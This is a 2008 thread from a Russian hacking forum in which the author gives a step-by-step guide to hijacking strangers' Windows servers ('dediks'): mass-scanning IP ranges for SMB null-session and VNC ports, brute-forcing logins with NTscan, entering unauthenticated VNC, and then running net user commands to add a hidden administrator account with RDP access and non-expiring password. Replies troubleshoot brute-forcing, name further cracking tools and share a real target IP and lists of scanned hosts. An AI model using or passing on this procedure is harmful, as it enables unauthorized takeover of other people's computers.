Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Добудем дедик (https://forum.antichat.xyz/showthread.php?t=68341)

Realix 25.04.2008 10:19

Добудем дедик
 
Добудем дедик


и так приступим .....
Мы будем искать деды на открытые порты 139,135 - null session и 5900 - VNC.

Можно использовать множество сканеров но я предпочитаю angry ip scanner качаем его Angry
чтобы было удобно юзать данный сканер создаём баник *.bat файлег с диапазонами в виде
Код:

ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt
отсюда видно что запускается наш сканер ipscan.exe сканирует диапазон от 192.168.0.1 до 192.168.2.2 и сохраняет результат в 192.168.0.1_192.168.2.2.txt
Чтобы не мучатся с вбивом диапазонов так как их может быть 400-500 а то и более был написан парсер для этого качаем парсер Parser
закидываем в парсер диапазоны в виде 192.168.0.1 192.168.2.2 он нам выдаст их в виде ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt
диапазоны по странам можно смотреть тут Ip rang
теперь настраиваем наш сканер на скан портов 139,135,5900 и запускаем наш сканер и идем пить кофе ну или лучше поспать :)
после скана одного диапазона создастся файлег в папке с сканером под названием ip от-до.txt(192.168.0.1_192.168.2.2.txt) если вы будете сканить 500 диапазонов то в папке со сканером будет 500 файликов
Для удобства парсинга результатов angry был написан еще 1 парсер качаем его Parser 2
закидываем в него все результаты от скана он нам разделит ипы на 3 столбца 139 135 5900
И так для брута дедов с открытой null session(139,135) я использую NTscan качаем его NTscan
думаю все разберутся как его юзать.
а так же для массавого чека VNC (5900) дедов используем VNCmasss качаем его VNCmass
VNCmasss позволит приконектится к бажному VNC деду без авторизации .

Когда NTscan сбрутит деда то пробуем к нему подключиться через RDP если не подключается то значит на деде закрыт порт 3389 про такой дед лучше забыть,а если открыт данный порт на дедике и мы зашли на дед то быстренько создаем учетку
cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit
заходм под свеже созданной учеткой и наслаждаемся добытым Дедиком


в случае если вы вошли на дед через бажный VNC то так же проверяем открыт ли порт 3389 если порт открыт по такому же примеру приведенному выше создаём учетку
Если RDP закрыт то на такой дед можно забить.Бажные Vnc Восновном на XP и толку от таких дедов мало.

Удачного всем брута и скана :)
Спасибо за внимание .

-=lebed=- 25.04.2008 11:56

1. Почему в качестве примера везде диапазон локальных адресов?
2. Ну бажный VNC может встретится, а что делать с найденым RDP
3. Можно ещё поискать другие сервисы удалённого администрирования, например Радмин, почему только два?
Резюме:
1. Боян.
2. Тема с@с@к нераскрыта
Вердикт: скорее всего delete (ели не будет дополнений и раскрытия темы)

AllenZ 25.04.2008 12:05

ну да... стать так себе, тема не раскрыта, протсо описание что да как. Таких "статей" в нете как... кароч пусть модеры решают.

VinTkz 17.05.2008 16:53

Описаны конкретные действия, думать ничего не нужно, я благодарен, буду пробовать, я новичок и все понял :)

Ali_MiX 17.05.2008 17:01

как же это старо, бажных дедиколв таких уже почти нет

ртуть 17.05.2008 17:02

многие кто рассуждает о дедах, имеют смутное понятие о них вообще!

Realix 18.05.2008 17:21

Цитата:

Сообщение от Ali_MiX
как же это старо, бажных дедиколв таких уже почти нет

Зря ты так говоришь я за ночь более 30 к насканиваю

ЗЫ нуль ссесия это не баг для очень умных :D
Цитата:

Сообщение от ртуть
многие кто рассуждает о дедах, имеют смутное понятие о них вообще!

Ет ты о чем :D

geezer.code 18.05.2008 22:06

Цитата:

И так для брута дедов с открытой null session(139,135) я использую NTscan
Цитата:

Когда NTscan сбрутит деда то пробуем к нему подключиться через RDP если не подключается то значит на деде закрыт порт 3389
брутом дедов никогда не занимался, НО не логичнее ли будет для 139 и 135 СНАЧАЛА проверить открытость порта 3389 при помощи того же ipscan.exe, а уже потом брутить, штобы не далать пустую работу ?

myp3zz 18.05.2008 22:49

кто бы че реальное подкинул, а не копипастенные измененные идейки...=\

Ali_MiX 18.05.2008 23:17

на http://forum.xeka.ru/ эта тема была

Realix 19.05.2008 08:08

Цитата:

Сообщение от geezer.code
брутом дедов никогда не занимался, НО не логичнее ли будет для 139 и 135 СНАЧАЛА проверить открытость порта 3389 при помощи того же ipscan.exe, а уже потом брутить, штобы не далать пустую работу ?

Нет не проще если открыт порт 3389 то не значит что на нем открыты порты 139,135 .Собственно можно сканить и 3389 сразу но так как таких дедиков гораздо больше это займет больше времени по парсингу и бруту ;)

Вуte 20.05.2008 17:55

сбрутил НТсканом пару дедиков, пассы не подходят

Realix 20.05.2008 18:47

обрати внимение на домен в который входишь ,а если нет выбора доменов то значит юзер не добавлен в группу удаленного админстрирования

rushter 01.06.2008 00:52

Перезалейте файлики на другой хостинг плз.

.Striker 07.06.2008 13:24

а как попасть на диапазон айпи именно серверов а не юзеров адсла какого то?

kenny666 07.06.2008 20:09

подскажите плз, че за трабла??
http://i039.radikal.ru/0806/77/dbe35733f517.jpg

Nelzone 07.06.2008 21:32

переводи на Promte))

Hellsp@wn 07.06.2008 21:56

у это юзера нет админских прав (т.к. админы могут удалённо коннектиться) + он ещё и не в группе удалённых пользователей.

.Striker 07.06.2008 23:19

я так понял нтскан перебирает только простые пароли или пустые.
А как сбратить нормальный пароль на дедике?

.Striker 08.06.2008 00:47

чет я не понимаю
насканил я серв 91.196.253.36
стоит вин 2к3
нтскан пишет
Код:

[91.196.253.36]: ping starting ...
[91.196.253.36]: connecting port 5900 ...
[91.196.253.36]: checking: administrator/[NULL] ...
[91.196.253.36]: checking: admin/[NULL] ...
[91.196.253.36]: checking: guest/[NULL] ...

All done
NTscan v1.0 stopped

и чем его брутить?

Realix 08.06.2008 07:06

Цитата:

Сообщение от .Striker
я так понял нтскан перебирает только простые пароли или пустые.
А как сбратить нормальный пароль на дедике?

в папке с нтсканом есть NT_pass.dic в него и вбивай свои пассы

Цитата:

Сообщение от .Striker
[91.196.253.36]: ping starting ...
[91.196.253.36]: connecting port 5900 ...
[91.196.253.36]: checking: administrator/[NULL] ...
[91.196.253.36]: checking: admin/[NULL] ...
[91.196.253.36]: checking: guest/[NULL] ...

All done
NTscan v1.0 stopped

Нт скан не брутит внц портеег , для внц можешь заюзать гидру

Dikey_ua 08.06.2008 10:15

У мну какой-о лог в нтскане раньше проходил на все пароли что в листе а шас тольео на Null =\

попугай 13.06.2008 06:52

А где брать адреса дедиков для брута?

Realix 13.06.2008 11:40

читай в статье :) сканить диапазоны ипов надо

satana8920 14.06.2008 16:05

да кстати почему весь описынный в этой статье подвинду???
что люди которые сидят под никсами не хотят деда???

Realix 14.06.2008 16:26

под никсами тоже можно запустить виндовые программы :) , даже подними ту самую виртуалку поставь винду и усе :) всегда можно найти способ.

.Striker 15.06.2008 15:19

добыл я дедик
Но вот проблема на нем винда хз на каком языке ничего не понятно и еще справа на лево все xD (дедик из стран ближнего востока)
Можно как то английский поставить чтобы было понятно?

satana8920 15.06.2008 15:29

перезалей куда нито на веб файл например или на дамп свой сканнер щяс тестить будем :)
и Parser тоже а то с рапиды ни в какую не качает су*а

Fata1ex 15.06.2008 15:31

http://ru.brothersoft.com/soft-112087.download

Google для кого? Зачем все время просить перезаливать?

.Striker 15.06.2008 21:59

а ntscan брутит 3389 порт?
я насканил 861 хостов с открытым этим портом, потом забил их в нтскан и никаких результатов он не дал.

если кому нада выложил файл с насканеными айпишниками http://www.uloz.cz/show/file/67549-host.txt может вам повезет с ними

satana8920 15.06.2008 22:40

ну вот я на сканил:
Код HTML:

12.1.52.72            Dead                  N/S                 
12.1.52.73            Dead                  N/S                 
12.1.52.74            Dead                  N/S                 
12.1.52.75            Dead                  N/S                 
12.1.52.76            Dead                  N/S                 
12.1.52.77            Dead                  N/S                 
12.1.52.78            Dead                  N/S                 
12.1.52.79            Dead                  N/S                 
12.1.52.80            Dead                  N/S                 
12.1.52.81            Dead                  N/S                 
12.1.52.82            154 ms                N/A                 
12.1.52.83            Dead                  N/S                 
12.1.52.84            Dead                  N/S                 
12.1.52.85            Dead                  N/S                 
12.1.52.86            160 ms                N/A                 
12.1.52.87            Dead                  N/S                 
12.1.52.88            Dead                  N/S                 

клал я в твой парсер нифига никаких результатов
че вообще с этим делать с насканеным добром?
обьясняй давай
зы тут блин у тя без бутылки не разберешься
я уже лично вторую допиваю а результату ноль :confused:
:D :D :D

Realix 16.06.2008 14:09

Юзай его консольно :)

Realix 16.06.2008 14:17

Цитата:

Сообщение от .Striker
а ntscan брутит 3389 порт?
я насканил 861 хостов с открытым этим портом, потом забил их в нтскан и никаких результатов он не дал.

если кому нада выложил файл с насканеными айпишниками http://www.uloz.cz/show/file/67549-host.txt может вам повезет с ними

нет он 3389 не брутит, брутит только нуль ссесию

Realix 16.06.2008 14:19

Цитата:

Сообщение от satana8920
ну вот я на сканил:
Код HTML:

12.1.52.72            Dead                  N/S                 
12.1.52.73            Dead                  N/S                 
12.1.52.74            Dead                  N/S                 
12.1.52.75            Dead                  N/S                 
12.1.52.76            Dead                  N/S                 
12.1.52.77            Dead                  N/S                 
12.1.52.78            Dead                  N/S                 
12.1.52.79            Dead                  N/S                 
12.1.52.80            Dead                  N/S                 
12.1.52.81            Dead                  N/S                 
12.1.52.82            154 ms                N/A                 
12.1.52.83            Dead                  N/S                 
12.1.52.84            Dead                  N/S                 
12.1.52.85            Dead                  N/S                 
12.1.52.86            160 ms                N/A                 
12.1.52.87            Dead                  N/S                 
12.1.52.88            Dead                  N/S                 

клал я в твой парсер нифига никаких результатов
че вообще с этим делать с насканеным добром?
обьясняй давай
зы тут блин у тя без бутылки не разберешься
я уже лично вторую допиваю а результату ноль :confused:
:D :D :D

ты в сканере порты забыл указать :) укажи в сканере порты и сохрани настройки

satana8920 16.06.2008 14:40

нет я указал порты но сканер ничего не нашел с огромного диапазона
дай аську поговорим

.Striker 16.06.2008 14:54

а чем же брутить 3389 порт?

.dimoN. 16.06.2008 15:15

Цитата:

Сообщение от .Striker
а чем же брутить 3389 порт?

насколько я знаю ничем, ну может есть приват брутер какой-то. А так надо искать с открытым 139 либо 5900 портом

Realix 16.06.2008 23:00

Цитата:

Сообщение от satana8920
нет я указал порты но сканер ничего не нашел с огромного диапазона
дай аську поговорим

10428

Realix 16.06.2008 23:01

Цитата:

Сообщение от .Striker
а чем же брутить 3389 порт?

Тс гриндером

Folc 23.06.2008 17:32

Блин результат ноль... Сегодня целый день просидел, ни чего не сбрутил. Есть ещё у кого статьи на эту тему и более новые проги...


Время: 13:16